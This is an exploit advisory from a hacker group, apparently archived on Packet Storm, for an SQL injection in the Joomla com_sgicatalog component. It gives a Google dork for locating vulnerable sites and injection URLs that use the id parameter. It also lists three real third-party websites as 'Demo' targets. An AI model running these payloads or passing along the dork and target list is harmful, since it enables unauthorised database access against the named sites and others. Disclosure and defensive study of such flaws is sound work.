Joomla Sgicatalog SQL Injection

2011-10-12T00:00:00
ID PACKETSTORM:105704
Type packetstorm
Reporter BHG Security Center
Modified 2011-10-12T00:00:00

Description

                                        
                                            `  
####  
# Exploit Title: Joomla Component (com_sgicatalog) <= SQL Injection Vulnerability   
# Google Dork: inurl:index.php?option=com_sgicatalog  
# Date: 2011-10-12  
# Author: BHG Security Center  
# Home: Http://black-hg.org  
# Software Link: http://joomlaapps.com/  
# Version: 1.x  
# Tested on: [Windows XP- Persian]  
# CVE : Webapps  
####  
  
  
  
[*] ExpLo!T :  
  
http://127.0.0.1/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'  
  
http://127.0.0.1/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi]  
  
http://127.0.0.1/path/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi]  
  
[*] Demo : http://umbertodei.it/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'  
  
[*] Demo : http://www.holmac.com/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'  
  
[*] Demo : http://www.anisap.veneto.it/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'  
  
####  
  
[+] Peace From #BHG  
  
Vunl Component : com_sgicatalog  
  
Error in file joomla Component (com_sgicatalog) Sql Injection  
  
A vulnerable parameter $ en&id=  
  
####  
  
=================================**BHG Security Center**=====================================|  
# Greets To : |  
|  
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn ~ Mikili |  
cmaxx ~ G3n3Rall ~ M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , farbodmahini ~ xb0y |  
s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ |   
============================================================================================ |  
`